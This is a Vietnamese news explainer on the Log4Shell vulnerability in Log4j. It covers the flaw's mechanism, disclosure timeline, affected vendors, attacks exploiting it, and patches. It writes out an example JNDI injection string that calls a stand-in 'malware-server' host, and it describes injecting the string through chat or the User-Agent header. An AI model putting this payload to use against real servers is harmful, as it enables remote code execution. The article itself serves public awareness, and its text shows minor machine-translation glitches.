Log4Shell, lỗ hổng bảo mật đang khiến Internet bùng phát là gì?

Trong vài ngày qua, Internet đã xôn xao về một lỗ hổng trong Log4j, một chương trình chưa được công chúng biết đến nhưng vẫn được sử dụng trong một số lượng rất lớn phần mềm và ứng dụng web. Tại sao lỗ hổng này lại đáng kể đến vậy? Chúng tôi giải thích cho bạn.

Log4Shell là gì?

Từ 9 Tháng 12, một lỗ hổng nghiêm trọng là trung tâm của tất cả các cuộc trò chuyện trong giới chuyên môn: nay được gọi là Log4Shell, nó hiện diện trong Log4j, một công cụ thường được sử dụng trong các ứng dụng Java để ghi lại các hoạt động và lỗi. Chương trình này được phát triển và duy trì bởi các tình nguyện viên từ Apache Software Foundation, điều này giải thích cho việc áp dụng rộng rãi của nó.

Lỗ hổng, được chỉ định là “CVE-2021-44228,” đã nhận được điểm CVSS là 10, mức xếp hạng tối đa. Điểm số mức độ nghiêm trọng cao này được giải thích là do việc khai thác quá tầm thường, vì chỉ cần một dòng là đủ: bằng cách đặt một loại lệnh đơn giản ” $ {jndi: ldap: // malware-server / resource} tại một nơi mà dữ liệu này sẽ được ghi lại bởi Log4j (ví dụ: một biểu mẫu), kẻ tấn công buộc kết nối với máy chủ của mình thông qua JNDI để truy xuất và thực thi tài nguyên được chỉ định, thường là một tập lệnh. Bằng cách này, anh ta có thể thực thi mã từ xa và làm bất cứ điều gì anh ta muốn trên máy chủ dễ bị tấn công. Marcus Hutchins, còn được gọi là MalwareTech, đã đăng một video để chứng minh lỗ hổng.

Trong số các ví dụ được công bố rộng rãi nhất về việc sử dụng lỗ hổng này, chúng tôi có thể trích dẫn lỗi đã ảnh hưởng đến Minecraft. Viết hướng dẫn được đề cập trong trò chuyện Minecraft là đủ để thực thi mã từ xa trên máy chủ, nhưng cũng trên máy tính của những người chơi có mặt trên máy chủ. Một minh họa khác liên quan đến tiêu đề Tác nhân người dùng, cho phép bạn biết, trong số những thứ khác, từ trình duyệt nào và hệ điều hành nào mà người dùng đang truy cập trang web và nội dung của ai thường được máy chủ web ghi lại. Bằng cách sửa đổi tiêu đề này để nó hiển thị hướng dẫn thay vì thông tin thông thường, hướng dẫn này sẽ được Log4j “diễn giải” khi nó được viết trong nhật ký, điều này giúp bạn có thể truy cập vào một máy chủ web dễ bị tấn công.

Lỗ hổng được biết đến từ khi nào?

Lỗ hổng này tồn tại ít nhất từ ​​tháng 9 năm 2013 trong Log4j. Vào năm 2016, một bài thuyết trình trong sự kiện Black Hat 2016 đã minh họa các khả năng thực thi mã từ xa bằng cách sử dụng JNDI, các khả năng áp dụng cho Log4j. Không rõ liệu các tình nguyện viên có biết về sự tồn tại của lỗ hổng vào thời điểm đó hay không, nhưng thực tế là nó vẫn chưa được vá vào thời điểm đó.

Trong trường hợp này, lỗ hổng đã được tiết lộ cho Apache vào ngày 24 tháng 11 bởi Chen Zhaojun của Alibaba Cloud. các 8 Tháng 12, nhà nghiên cứu đã cảnh báo các tình nguyện viên về việc một người dùng ẩn danh đã tiết lộ chi tiết về lỗ hổng trên một nền tảng blog của Trung Quốc. các 9 Tháng 12, một nhà nghiên cứu xuất bản trên Twitter mô tả về lỗ hổng bảo mật và ví dụ về việc khai thác nó. Trong khi đó là khi việc khai thác lớn của nó bắt đầu, Cloudflare và Cisco cho biết họ đã thấy các ví dụ về việc sử dụng nó bởi những kẻ tấn công 1^ờ và 2 Tháng Mười Hai, mà không biết làm thế nào mà một số diễn viên nhất định nhận thức được sự tồn tại của nó.

Ai bị ảnh hưởng bởi Log4Shell?

Nói một cách cụ thể, tất cả các ứng dụng và phần mềm sử dụng Log4j trong một phiên bản khác nhau, từ 2.0 tại 2.14.1. Rất khó để thiết lập một danh sách đầy đủ, nhưng cơ sở dữ liệu đang bắt đầu xác định phần mềm và nhà cung cấp có dễ bị tấn công hay không. BleepingComputer cũng duy trì một danh sách ở phía của nó. Các thương hiệu và chương trình được biết đến và xác nhận là dễ bị tấn công bao gồm Minecraft, AppleTesla, Steam, TwitterRedis, ElasticSearch và tất nhiên, Apache.

Cơ quan An ninh mạng và Cơ sở hạ tầng (CISA) đã cảnh báo rằng hàng trăm triệu hệ thống có khả năng bị tấn công.

Ai đang khai thác lỗ hổng này?

Ngay sau khi lỗ hổng và cách khai thác nó được công khai, tin tặc đã nắm bắt cơ hội để tìm kiếm các máy chủ dễ bị tấn công. Một số người trong số họ bắt đầu lây nhiễm các máy chủ bằng các công cụ khai thác tiền điện tử. Ví dụ, các tin tặc đằng sau Kinsing sử dụng lỗ hổng để chạy các tập lệnh loại bỏ phần mềm độc hại của đối thủ cạnh tranh và cài đặt của riêng họ để khai thác tiền điện tử. Theo báo cáo của Netlab 360, mạng botnet Mirai và Muhstik cũng có liên quan. Microsoft cho biết họ đã chứng kiến ​​những kẻ tấn công triển khai đèn hiệu Cobalt Strike, thường được tin tặc sử dụng để cài đặt ransomware.

Lỗ hổng cũng được sử dụng để lấy dữ liệu có trong các biến môi trường, chẳng hạn như khóa bí mật. Cho đến nay, chưa có phần mềm tống tiền nào được triển khai bằng cách sử dụng lỗ hổng này. Nhưng đối với hầu hết các nhà nghiên cứu, nó sẽ không lâu nữa.

Nếu dự án là mã nguồn mở, tại sao không ai nhận ra nó trước đây?

Người ta thường nói rằng các dự án mã nguồn mở an toàn hơn vì mã nguồn của chúng là công khai nên bất kỳ ai cũng có thể kiểm tra nó và tìm ra lỗ hổng. Trên thực tế, một số dự án mã nguồn mở được sử dụng rộng rãi như Log4j chỉ được duy trì bởi một số tình nguyện viên tình nguyện, với hầu hết các công ty chỉ sử dụng chúng trong sản phẩm của họ mà không tham gia cụ thể vào chính dự án.

Đối với Log4j, sáu tình nguyện viên phụ trách việc bảo trì nó vào thời gian rảnh của họ. Không ai có mặt trên đó toàn thời gian, điều này giải thích tại sao một lỗ hổng như vậy có thể không được chú ý và tại sao các nhà phát triển phải mất vài ngày để phát hành một bản vá để sửa chữa nó.

Tình huống này không phải là mới: vào năm 2014, lỗ hổng Heartbleed nghiêm trọng là kết quả của sự đóng góp của một nhà phát triển tình nguyện cho dự án OpenSSL đã được xác thực trong khi có lỗi ở cấp độ xác thực. Vào thời điểm đó, lỗ hổng này đã làm nổi bật việc thiếu phương tiện và người đóng góp cho các dự án nguồn mở và hậu quả của việc thiếu này, đặc biệt là đối với những đóng góp được sử dụng đại trà. Một số công ty lớn đã thành lập một kế hoạch tài trợ, Sáng kiến ​​Cơ sở hạ tầng Cốt lõi, để giúp tài trợ cho các dự án nguồn mở lớn. Tuy nhiên, như Log4Shell cho thấy, tình hình vẫn còn bấp bênh đối với nhiều dự án trong số này và các lỗ hổng nghiêm trọng tiếp tục phát sinh do sự thiếu hụt nghiêm trọng về nguồn lực và tình nguyện viên này.

Có những cách nào để sửa chữa lỗ hổng này?

Lỗ hổng đã được sửa trong phiên bản 2.15.0 của Log4j, nhưng sẽ an toàn hơn khi tải xuống phiên bản 2.16.0, hoàn toàn tắt JNDI theo mặc định. Một số biện pháp giảm thiểu khả thi đã được chia sẻ trong trường hợp bản cập nhật phức tạp, chẳng hạn như “vắc xin” được phát triển bởi các nhà nghiên cứu Cybereason cung cấp giải pháp tạm thời bằng cách sử dụng chính lỗ hổng để thực hiện thay đổi từ xa.

Về phía người dùng, không thể làm gì hơn ngoài việc chờ đợi và cập nhật phần mềm dễ bị tấn công khi có sẵn. Minecraft, chẳng hạn, đã tạo một bản vá và cung cấp hướng dẫn cho những người lưu trữ máy chủ của riêng họ.

Tôi có nên đốt cháy máy tính của mình không?

Không, chưa, ngay cả khi chắc chắn rằng lỗi là một trong những lỗi quan trọng nhất trong những năm gần đây và chúng ta vẫn chưa biết hết hậu quả của sự tồn tại của nó. Mặt khác, cẩn thận với việc sử dụng Internet và phần mềm cũng như bảo vệ bản thân bằng phần mềm bảo mật luôn là một ý kiến ​​hay.